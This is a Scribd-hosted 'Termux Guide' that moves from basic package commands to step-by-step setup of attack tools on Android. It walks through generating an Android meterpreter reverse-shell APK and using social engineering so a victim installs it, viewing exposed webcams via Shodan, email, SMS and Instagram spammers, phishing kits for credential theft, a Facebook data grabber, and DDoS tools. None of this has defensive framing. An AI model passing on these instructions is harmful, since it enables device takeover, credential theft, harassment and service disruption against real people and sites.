0% found this document useful (0 votes)
319 views

Termux Guide

This document provides a guide to Termux that includes basic commands, instructions for installing tools such as Python, cURL, and wget, and descriptions of numerous hacking tools such as Metasploit, Tool-X, FSociety, Lazymux, RouterSploit, IPGeolocation, Malicious, and more. It also includes instructions for using these tools, such as generating malicious apks with Malicious or scanning network devices for vulnerabilities with RouterSploit.
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
319 views

Termux Guide

This document provides a guide to Termux that includes basic commands, instructions for installing tools such as Python, cURL, and wget, and descriptions of numerous hacking tools such as Metasploit, Tool-X, FSociety, Lazymux, RouterSploit, IPGeolocation, Malicious, and more. It also includes instructions for using these tools, such as generating malicious apks with Malicious or scanning network devices for vulnerabilities with RouterSploit.
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 11

TERMUX GUIDE

Content
• ls..................................................................................................................................3
• ls..................................................................................................................................5

Basic Commands:

GIVE STORAGE PERMISSIONS TO TERMUX


termux-setup-storage

apt update

Update the list of available packages. These commands must be run initially
directly after installation and regularly thereafter to receive updates.

apt upgrade

Update obsolete packages. In order for Apt to learn about newer packages,
you'll need to update the package index, so you'll typically want to run apt
update before updating.

apt search <query>

Search among available packages.

apt install <package>

Install a new package.

apt show <package>

Show information about a package.

apt list

Lists all available packages.

apt list --installed

Lists all installed packages.

apt remove <package>

Remove an installed package


Apt as a package manager uses a package format called dpkg. Typically using
dpkg directly is not necessary, but the following two commands may be helpful:

dpkg -L <package>

List of installed files of a package.

dpkg --verify

Verify the integrity of installed packages.

See the apt man page (run apt install man to install a man page viewer first) for
more information.

ls

Show what's inside the folder

CD

It takes us home

cd <file name>

Go to said file

exit

Exit the terminal

Volume down button + keyboard letter C

Cancel or cancel process

Install Python, Pyhton3 and pip3


•pkg install python
•pkg install python3
•pkg install python-pip
•pkg install python3-pip

Install cURL, php and wget


•pkg install curl
•pkg install php
•pip3 install wget

Some tools:
Metasploit
It is designed to exploit computer vulnerabilities and is undoubtedly the program
most used by the best hackers in the world.
• pkg upgrade
• pkg install curl
• curl –LO
https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/met
asploit.sh
• chmod 777 metasploit.sh
• ./metasploit.sh
• ls
• cd metasploit-framework
• Start the console: ./msfconsole
TOOL-X
It is a Script to easily install different tools:

• pt update
• pkg install git
• git clone https://github.com/Rajkumrdusad/Tool-X.git
• cd Tool-X
• chmod +x install.aex
• sh install.aex if it doesn't work run ./install.aex
• Run from Tool-X console

FSociety
A penetration testing framework will have all the scripts a hacker needs.

• git clone https://github.com/Manisso/fsociety.git


• cd fsociety
• chmod +x install.sh
• bash install.sh or ./install.sh
• python2 fsociety.py

Lazymux
Tool similar to fsociety

• git clone https://github.com/Gameye98/Lazymux


• Lazymux cd
• python2 lazymux.py
RouterSploit:

routerSploit is an open source security framework very similar to the well-known


Metasploit with which we can audit our devices (routers, webcam, NAS, etc.) to
check if they have known vulnerabilities.

The framework has the following 5 modules:

exploits: modules that take advantage of identified vulnerabilities.

creds: Modules for testing credentials in network services.


scanners: modules that check if a target is vulnerable to any exploit.

payloads: modules to generate payloads on various architectures.

generic: modules that perform generic attacks.

<INSTALLATION>

routerSploit requires the following packages:

- future
- requests
- paramiko
- pysnmp
- pycrypto

• we install pip in Python3.


• apt install python3-pip

We clone the repository to our team.

• git clone https://github.com/threat9/routersploit

We position ourselves in it.

• cd routersploit
We install the requirements.
• python3 -m pip install -r requirements.txt
• python3 -m pip install -r requirements-dev.txt
• We run RouterSploit
• python3 rsf.py

<USE>

To use RouterSploit, we only need to know the IP of the device to be audited, if


you have not changed your IPs, possibly your router's is 192.168.1.1 or
192.168.0.1

Once RouterSploit is launched, we select the scanner module with autopwn (this
will launch all exploits against the target)

• use scanner/autopwn

We mark the target

• set target [DEVICE-IP]

We launch the attack


• run

IP Geolocation:
Tool that geolocates the victim using their IP address:

• git clone https://github.com/maldevel/IPGeoLocation


• pip3 install -r requirements.txt –user
• ./ipgeolocation.py –h (for options)

Malicious:
Malicious is a tool to create infected apk or executables for android, mac,
windows etc... Very good tool, waited and you like it.
First we proceed to update the terminal with

• apt update && apt upgrade -y


And if you don't have git or python, we install them with

• apt install git python2 -y


Having the above, we continue to clone the git

• git clone https://github.com/Hider5/Malicious


• When finished we select malicious with
• cd Malicious

• And we proceed to give permissions


• chmod 777 malicious.py
• And we list with
• ls
• And we install the following
• pip2 install -r requirements.txt
• pip2 install --upgrade pip
• And we go on to execute it with
• python2 malicious.py

A list of systems will appear to which a malicious apk can be generated, in this
case Android 1
And for example dendroid
35
The apk will now be generated for us. To move it to memory so we can share it,
we proceed to list and then select Android
ls
android cd

We list again

ls
mv Dendroid.apk /sdcard

And you can now find it in your storage...

Devploit

Devploit is a multi-tool that will allow you to do various functions such as tracking
an IP to extracting data from web pages and devices... I hope you like it
- git clone https://github.com/joker25000/Devploit
- cd devploit
- chmod +x install
- ./install
- python2 Devploit.py
WepPwn3r
Today I bring you the WepPwn3r tool that is used to scan web pages for bugs
and vulnerabilities.

For those who are just installing termux, put the following...
• -apt update
• -apt upgrade
• -pkg install git
• -pkg install python

• Now we move on to installing the tool that interests us...

• -git clone https://github.com/zigoo0/webpwn3r


• -cd webpwn3r
• -chmod +x scan.py
• -python2 scan.py

Some tools using metasploit:


Tmvenom:
I pasted the following text from a post that was previously uploaded to
BLACKQACKERS
How to j4ck34ar an Android from t3rmux or from Linux (I'm not very sure that it
works on Linux, I haven't tried it)
<Requirement>
Have Metasploit installed in t3rmux
I recommend having Es file Explorer
Procedure
1- apt update
2- apt upgrade
3- pkg install pip
4- pkg install git
5- pkg install python2 (Only in case you don't have it installed
6- pkg installl php
7- git clone https://github.com/TechnicalMujeeb/tmvenom
8- tmvenom cd
9- ls (list folder content)
10- chmod +x tmvenom.py
11- sh install.sh
12- python2 tmvenom.py
Ok, if you did everything right and have Mestasploit installed on your termux
It will leave you a menu with 11 options, you will choose 1 for a payload on
Android
- The attack that we are going to carry out is going to be done within the LAN,
so we are going to open another terminal and put the command
ifconfig
which will give us our IP. The IP can be found at the bottom of putting the
command where it says.
inet add:"YOUR IP"
Or they simply go to their cell phone settings, Wi-Fi, enter the Wi-Fi network to
which they are connected and the IP appears.
- Ok, then we are going to copy the mentioned IP and we return to session 1
and put it
-After putting it in, it will ask us for a port, the script recommends 4444
And this is the one we are going to put
4444
- From there it will ask us for the route where we want to save it, which we will
put

/sdcard/"Name you want to give to the payload example="


/sdcard/virus.apk from there the script will proceed to generate the payload, the
payload can be found in the internal storage, so we download Es file explorer
- From there it will tell us if we want to start entering listening mode, which we
will put a "y"
which Metasploit will be executing for us :)
- When Metasploit starts we will put the following commands
• use multi/handler
• set payload android/meterpreter/reverse_tcp
• set lhost "the ip they previously entered that they obtained with the
ifconfig command"
• set lport 4444
• exploit
- From there it will go into listening mode and wait for someone to run the
application.
there you must apply your social engineering techniques so that the victim falls
In my case I am on my own cell phone
- Ok, when the person installs the app and opens it, the payload is executed
and in the termux terminal
and with the "help" command we can see all the options we have,
and that's it we have j4ck3ed an Android
SHODAN:
WHAT IS SHODAN?
Shodan is a search engine that is capable of finding any device connected to the
internet. Shodan works mainly with the deep web and is classified as the
scariest search engine in the world since it finds devices of any type as long as
they have an internet connection, for example. example: traffic lights, security
cameras, computers, water plants, electrical networks, etc.
HOW DOES SHODAN WORK?:
Search engines like Google index web content, at least those that are public,
through ports 80 and 443 (HTTP and HTTPS), the peculiarity of Shodan is that it
tracks all other existing ports, allowing it to find any device who has an IP, that
is, anyone who has an internet connection.
<use>

Work with metasploit


The configuration:

• Cd metasploit-framework
• ./msfconsole
• use auxiliary/gather/shodan_search
• show options
Then they create an account on shodan
They go to shodan.io
Click to create green button
Then you start transfer
Then click where the blue arrow points
You will get something like this
- m02ZKlMk4qQTHUVooORM7Pf5Va7OI4oH copy
They go to termux and finish configuring
Then

• -et SHODAN_APIKEY AND PASTE WHAT THEY COPIED


• -et QUERY "webcamxp"
• run

You will get a list of IP addresses, copy any IP address and paste it into your
browser.
And shows them the camera
Email, SMS and Instagram spammers
Email-bomber:
• git clone https://github.com/zanyarjamal/Email-bomber.git
• cd Email-bomber
• python2 E-bomber.py
• It will ask for a mail server, Gmail or Yahoo
• It will ask for your email depending on what you entered above. Enter
your email
• Enter your password to log in (it's secure)
• Enter the victim's email, the message to send and the number of emails
to send
Spammer-Grab
• git clone https://github.com/Noxturnix/Spammer-Grab
• cd Spammer-Grab
• ./auto-install.sh
• python2 spammer.py –h (h shows you the commands)
• Example:

• Python2 spammer.py –delay 15 (delay is the time it will take to send the
messages, you can enter any number) (here the victim number with the
country code)
• Python2 spammer.py –delay 10 5918844747

Instaspam:
Tool to spam Instagram accounts

• git clone https://github.com/thelinuxchoice/instaspam.git


• cd instaspam
• chmod +x instaspam.sh
• bash instaspam.sh or ./instaspam.sh
Phishing tools:
Hidden Eye:
Scripts containing several cloned pages to obtain credentials:

• pkg install git python php curl openssh grep


• pip3 install wget
• git clone https://github.com/DarkSecDevelopers/HiddenEye.git
• cd HiddenEye
• pip3 install -r requirements.txt
• chmod 777 HiddenEye.py
• python3 HiddenEye.py

ShellPhish:
Tool to do phishing and also extracts IP addresses and extra information

• git clone https://github.com/thelinuxchoice/shellphish


• cd shellphish
• bash shellphish.sh or ./shellphish.sh

Tool to obtain information from your friends on Facebook:


There is also an alternative tool to OSIF that does exactly the same thing, just
search Google for fbi github and that's it.
OSIF:
• pkg update upgrade
• pkg install git python2
• git clone https://github.com/ciku370/OSIF
• cd OSIF
• pip2 install -r requirements.txt
• python2 osif.py
• type help so that the options appear
• Here it will ask you to log in with your Facebook account to create a
Tokken, do it normally, nothing will happen, if it doesn't allow you, it may
be because you activated double verification on your face, deactivate it
for a minute to log in and that's it, then it won't ask you to log in again.
they log in
Tools for DDOS attacks
Xerxes:
• apt install git
• apt install clang
• git clone https://github.com/zanyarjamal/xerxes
• cd xerxes
• clang xerxes.c -o xerxes
• ./xerxes website 80
HULK:
• Git clone https://github.com/grafov/hulk.git
• cd hulk
• Python2 hull.py -site http://example.com/test/ 2>/dev/null

Tool to extract metadata from images: ExiF:


• Git clone https://github.com/ivam3/Exif
• Cd Exif
• Chmod +x install.sh
• Sh install.sh or bash install.sh or ./install.sh
• It is recommended to use EsfileExplorer to obtain the specific address of
the image

You might also like